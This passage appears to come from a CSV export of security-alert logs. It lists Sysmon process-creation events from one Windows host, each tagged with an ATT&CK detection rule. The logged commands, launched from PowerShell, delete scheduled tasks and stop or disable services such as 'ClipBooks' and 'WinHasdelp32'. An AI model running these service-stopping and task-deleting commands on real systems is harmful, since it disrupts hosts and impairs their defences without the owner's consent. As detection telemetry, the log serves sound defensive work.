Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:20:34.426",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.653 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010e4b72e00} +ProcessId: 1676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.718185700Z"",""eventRecordID"":""3533"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.653\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010e4b72e00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: 
Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.653"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-0010e4b72e00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.382",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.485 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010b8b52e00} +ProcessId: 3540 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.527454900Z"",""eventRecordID"":""3532"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.485\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-0010b8b52e00}\r\nProcessId: 3540\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.485"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-0010b8b52e00}"",""processId"":""3540"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.349",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.248 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00105fb32e00} +ProcessId: 1440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.252761100Z"",""eventRecordID"":""3530"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.248\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00105fb32e00}\r\nProcessId: 1440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:05.248"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00105fb32e00}"",""processId"":""1440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.296",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.188 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001040b02e00} +ProcessId: 1520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.191394600Z"",""eventRecordID"":""3527"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.188\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001040b02e00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.188"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001040b02e00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.285",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.163 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001043af2e00} +ProcessId: 2496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 
WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.166840300Z"",""eventRecordID"":""3526"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.163\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001043af2e00}\r\nProcessId: 2496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.163"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001043af2e00}"",""processId"":""2496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHasdelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.250",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.114 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00106fad2e00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.129054200Z"",""eventRecordID"":""3524"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.114\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-00106fad2e00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.114"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-00106fad2e00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.129",8,"ATT&CK T1489: Stop Windows Service","""Process 
